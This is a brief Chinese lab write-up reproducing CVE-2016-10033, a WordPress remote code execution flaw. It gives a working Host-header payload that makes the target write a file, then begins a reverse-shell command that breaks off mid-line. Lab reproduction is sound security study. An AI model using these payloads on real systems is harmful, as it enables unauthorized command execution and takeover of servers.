漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)

漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。
复现过程
1、打开靶场:漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)2、找到登录页面:
漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)3、假设我们知道存在的真实用户名,admin 进入漏洞页面

漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)
4、点击Get new passwd并使用BP抓包,修改host的值为:

target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}}

漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)5、放包后,可看到靶机相应目录生成了succes文件
漏洞复现 wordpress 远程代码执行 (CVE-2016-10033)6、反弹shell原命令:

target(any -froot@localhost -be ${run{bash -i >& /dev/